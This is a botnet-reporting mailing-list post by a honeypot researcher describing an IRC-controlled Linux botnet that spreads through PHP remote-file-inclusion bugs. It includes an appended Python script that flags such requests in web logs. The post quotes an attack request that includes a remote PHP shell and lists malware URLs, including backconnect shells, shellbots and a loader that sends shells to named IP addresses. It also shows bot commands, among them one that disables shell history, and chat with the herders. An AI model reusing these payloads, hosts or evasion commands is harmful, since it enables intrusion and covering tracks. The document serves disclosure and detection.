To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
Hi all,
nice shot Bodik ;]

I found a different botnet on eu.undernet.org, chan #vx8. It's a Linux zombie-based botnet that spreads through various bugs in PHP. Undernet admins, please take a look at it. Description follows. Botnet herders are Denzel, xeQt, aslpls-.

First attempt:

85.17.11.53 - - [20/Mar/2007:04:10:41 +0100] "GET /index.php?loc=http://nawader.org/modules/Top/kgb.c? HTTP/1.1" 200 132 "-" "libwww-perl/5.79"

We mirror all links included; the engine for RFI source is not completed yet, so for this time I send raw URLs.

http://nawader.org/modules/Top/kgb.c
http://www.honeynet.cz/bots/5249235d1476c24250130da98b9a34b5.txt
- PHP shell which includes other links

http://nawader.org/modules/Top/bc.txt
http://www.honeynet.cz/bots/4456038f56e4b71b01ed0a348cbfeb41.txt
- Backconnect shell

http://nawader.org/modules/Top/n.txt
http://www.honeynet.cz/bots/adc704f9697cdf89da9d503b11f9787d.txt
- Shellbot I, connects to eu.undernet.org #vx8

http://nawader.org/modules/Top/teamrx
http://www.honeynet.cz/bots/68f984e9f37e3911b92493cbb9b04aef.txt
- Loader for n.txt and bc.txt; runs backconnect and sends shell to 220.232.137.199 and 64.38.11.130

http://nawader.org/modules/Top/toyo.txt
http://www.honeynet.cz/bots/80d97c973062d7d2d369f5f79578a597.txt
- Shellbot II, connects to eu.undernet.org #vx8

All scripts are labelled "xeQt vS TeaMrx".

Who is on chan: http://www.honeynet.cz/trash/list

After a while on the channel, the bot herders move bots to another chan.

#vx8 :<@xeQt> !x !join #perljunkies aV5&bvhyI
#vx8 :<@xeQt> !x !join #mp3fulls 209x5Vi.

Here is the list from uname -sr: http://www.honeynet.cz/trash/uname

chat:

<crop>
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im no geek i tould u
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im a criminal
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :make shit
<< PRIVMSG #vx8 :i now that you are criminal
<< PRIVMSG #vx8 :but still on free ?
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :nothings free
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :$$
<< PRIVMSG xeQt :^AVERSION^A
>> :[EMAIL PROTECTED] NOTICE nirgil :^AVERSION mIRC v6.17 Khaled Mardam-Bey^A
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :its my life
<< PRIVMSG #vx8 :jail is for free
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i know
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im going sooon
<< PRIVMSG #vx8 :y are waiting for ?
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :its full
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :a few months
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im no murder, so i goto wait
</crop>

<crop>
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :thats a trickey one
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :cuz i dont touch any of the servers
<< PRIVMSG #vx8 :when u installed your script throught bug in php that's touching too
>> :[EMAIL PROTECTED] PRIVMSG #vx8 ::)))
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i tould you
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :its magic
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont connect to anything
<< PRIVMSG #vx8 :yes u did
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :no i didn't
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :all the bots do my job
<< PRIVMSG #vx8 :and that is ?
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :you know what mass spread is?
<< PRIVMSG #vx8 :<@xeQt> !x !join #perljunkies aV5&bvhyI
<< PRIVMSG #vx8 :and what about this ?
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :so?
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :how you get this ip address from that?
<< PRIVMSG #vx8 :this command is better one..
<< PRIVMSG #vx8 :<@xeQt> !x uname -sr
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :!x id
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=33949(nucsaor) gid=33952(nucsaor) groups=33952(nucsaor)
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=33(www-data) gid=33(www-data) groups=33(www-data)
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :like that?
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=80(www) gid=80(www) groups=80(www)
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=80(www) gid=80(www) groups=80(www)
<< PRIVMSG #vx8 :yes, now you are in direct connect with these servers ..
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont think you have no clue man
<< PRIVMSG #vx8 :thats the point of abuse ..
<< PRIVMSG #vx8 :these servers are yours ?
<< PRIVMSG #vx8 :or not ?
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i understand your pissed off, but this is useless
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :call the cops, make them trace me... but its useless
<< PRIVMSG #vx8 :I think that all servers here are used to fraud ..
<< PRIVMSG #vx8 :i dont think so ..
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :!x unset HISTFILE HISTSAVE
<< PRIVMSG #vx8 :heh
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :o_0
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont see how you get ip from that
<< PRIVMSG #vx8 :from what ?
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :David Hac?
<< PRIVMSG #vx8 :?
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :David Hac
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :man
<< PRIVMSG #vx8 :what ?
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :good luck hunting me
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :with feds
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :its useless
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :for sure
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :but do it.. i dont say no but.. goood luck
<< PRIVMSG #vx8 :i'm not hunting you, thats work for authorities.
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :yes
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :goood
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i like a channelge
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :challenge
<< PRIVMSG #vx8 :so what for now ?
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont need to
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :why wold i do that?
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im the bitch, you the victum..
<< PRIVMSG #vx8 :i'm not victim ..
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :you hunt me
<< PRIVMSG #vx8 :others are victims ..
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :your right
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :you a cop?
<< PRIVMSG #vx8 :yes
<< PRIVMSG #vx8 :;]
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :and?
>> :[EMAIL PROTECTED] NICK :CopKiller
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :what you gonna do about it?
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :call your friends, girlfriends....
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :cuz i dont give a fuck
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :here i kick cops
<< PRIVMSG #vx8 :so kick me dude ;]
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :dont need to
<< PRIVMSG #vx8 :heh
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :come here and ill show you
<< PRIVMSG #vx8 :i'm here
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :in my hoood
>> :[EMAIL PROTECTED] PRIVMSG #vx8 :not mirc
</crop>

Cheers..
David Vorel
_______________________________________________
All list and server information are public and available to law enforcement upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
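
Added example, not part of the original post: a log check that flags requests like the "First attempt" line in the message above, where a query parameter carries a remote URL. The function name and the constructed sample lines are assumptions; only the first sample line comes from the post.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" access-log line, the format of the request quoted in the post.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def find_remote_include_params(lines):
    """Return one record per query parameter whose decoded value is a remote URL.

    This is a triage signal, not proof of compromise: legitimate redirect
    parameters match too, and the HTTP status says nothing about whether
    the include actually happened.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a combined-format line
        query = urlsplit(m.group('target')).query
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                hits.append({
                    'ip': m.group('ip'),
                    'time': m.group('ts'),
                    'param': name,
                    'remote': value.rstrip('?'),  # drop the trailing '?' seen in the post
                    'status': int(m.group('status')),
                    'scripted_ua': m.group('ua').lower().startswith('libwww-perl'),
                })
    return hits

SAMPLE_LOG = [
    # From the post:
    '85.17.11.53 - - [20/Mar/2007:04:10:41 +0100] "GET /index.php?loc=http://nawader.org/modules/Top/kgb.c? HTTP/1.1" 200 132 "-" "libwww-perl/5.79"',
    # Constructed lines (documentation addresses and hosts):
    '192.0.2.10 - - [20/Mar/2007:05:00:00 +0100] "GET /page.php?inc=http%3A%2F%2Fexample.invalid%2Fa.txt%3F HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [20/Mar/2007:05:01:00 +0100] "GET /index.php?loc=news&id=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for hit in find_remote_include_params(SAMPLE_LOG):
        print(hit)
```

The `remote` values it returns are the URLs worth mirroring and reporting to the hosting provider, as the post does by hand.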
